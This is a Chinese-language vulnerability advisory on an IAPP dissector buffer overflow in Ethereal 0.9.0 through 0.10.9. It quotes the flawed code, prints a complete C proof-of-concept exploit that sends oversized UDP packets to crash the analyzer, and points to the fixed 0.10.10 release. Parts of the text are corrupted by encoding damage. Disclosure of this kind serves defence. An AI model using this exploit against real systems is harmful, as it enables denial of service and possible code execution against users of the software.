受影響系統:
Ethereal Group Ethereal 0.9.9
Ethereal Group Ethereal 0.9.8
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.6
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.4
Ethereal Group Ethereal 0.9.3
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.16
Ethereal Group Ethereal 0.9.15
Ethereal Group Ethereal 0.9.14
Ethereal Group Ethereal 0.9.13
Ethereal Group Ethereal 0.9.12
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.10
Ethereal Group Ethereal 0.9.1
Ethereal Group Ethereal 0.9.0
Ethereal Group Ethereal 0.10.9
Ethereal Group Ethereal 0.10.8
Ethereal Group Ethereal 0.10.7
Ethereal Group Ethereal 0.10.6
Ethereal Group Ethereal 0.10.5
Ethereal Group Ethereal 0.10.4
Ethereal Group Ethereal 0.10.3
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10
不受影響系統:
Ethereal Group Ethereal 0.10.10
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 12762
Ethereal是很多網絡專業人員都在使用的網絡協議分析器,可以用來分析網絡的運行狀況���,支持幾乎所有協議。
Ethereal的IAPP處理模塊中存在漏洞。網絡報文中的長度值可能覆蓋靜態的緩沖區。漏洞位于dissect_pdus()函數中�。長度值是通過2個guint8變量計算得出的��,將第一個左移���,然后加入第二個���,因此這個值最高可到65535����。隨后的循環可能濫用這個長度來溢出靜態緩沖區textbuffer[2000]�。
packet-iapp.c
-------------
static void
dissect_pdus(tvbuff_t *tvb, int offset, PRoto_tree *pdutree, int pdulen)
{
...
int len;
...
tvb_memcpy(tvb, (guint8 *)&pduhdr, offset, sizeof(e_pduhdr));
len = (((int)pduhdr.pdu_len_h) << 8) + pduhdr.pdu_len_l;
...
}
-------------
packet-iapp.c中有漏洞循環的示例:
-----------------
pduval_to_str(int type, int len, tvbuff_t *tvb, int offset)
{
...
case IAPP_PDU_MSADDR:
mac = tvb_get_ptr(tvb, offset + 3, len);
for (z = 0; z < len; z++)
run += sprintf(run, "%s%02x", z ? ":" : "", mac[z]);
break;
...
}
----------------
遠程執行代碼要取決于溢出的緩沖區環境�,可能是可行的,但未確認�。
測試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性�,僅供安全研究與教學之用����。使用者風險自負!
["eth2.c" (text/plain)]
/*
*
* Ethereal IAPP remote buffer overflow #2 PoC eXPloit
* ---------------------------------------------------
* To test this vulnerability on windows, try to send 3-10 packets
* that will trigger the crash, and scroll between captured packets
* in Ethereal.
*
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security <http://security.lss.hr/en/>
*
*/
#include
#include
#pragma comment (lib,"ws2_32")
#define IAPP_PDU_SSID 0
typedef strUCt _e_iapphdr {
unsigned char ia_version;
unsigned char ia_type;
} e_iapphdr;
typedef struct _e_pduhdr {
unsigned char pdu_type;
unsigned char pdu_len_h;
unsigned char pdu_len_l;
} e_pduhdr;
void xp_sendpacket (char *pack)
{
Word wVersionRequested;
WSADATA wsaData;
int err;
int sock,i;
struct sockaddr_in sin;
unsigned char buf[2000];
char bla[2000];
e_iapphdr *iapp;
e_pduhdr *pdu;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("error!!! ");
ExitProcess(-1);
}
sock=socket(AF_INET,SOCK_DGRAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(2313);
iapp = (e_iapphdr*)&buf;
iapp->ia_version = 1;
iapp->ia_type = 1;
pdu = (e_pduhdr*)(buf+2);
pdu->pdu_type = 3;
pdu->pdu_len_h = 0x05;
pdu->pdu_len_l = 0xa1;
memset (bla,`xfc`,1300);
strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
// for (i=0;i<1000;i++)
sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
}
main (int argc, char **argv)
{
xp_sendpacket(argv[1]);
}
建議:
--------------------------------------------------------------------------------
廠商補?����。?/P>
Ethereal Group
--------------
目前廠商已經發布了升級補丁以修復這個安全問題����,請到廠商的主頁下載Ethereal 0.10.10:
http://www.ethereal.com/class/download.Html
